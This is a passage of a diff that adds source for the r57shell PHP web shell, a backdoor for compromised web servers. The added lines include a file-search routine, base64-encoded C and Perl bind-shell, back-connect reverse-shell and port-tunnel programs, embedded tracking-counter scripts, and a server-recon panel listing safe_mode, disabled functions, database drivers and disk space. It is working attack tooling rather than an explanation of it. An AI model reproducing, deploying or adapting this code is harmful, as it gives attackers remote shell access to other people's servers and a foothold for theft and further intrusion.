+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
+@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}}  
+echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
+</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; }
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>".ws(2);
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+if(!$windows){
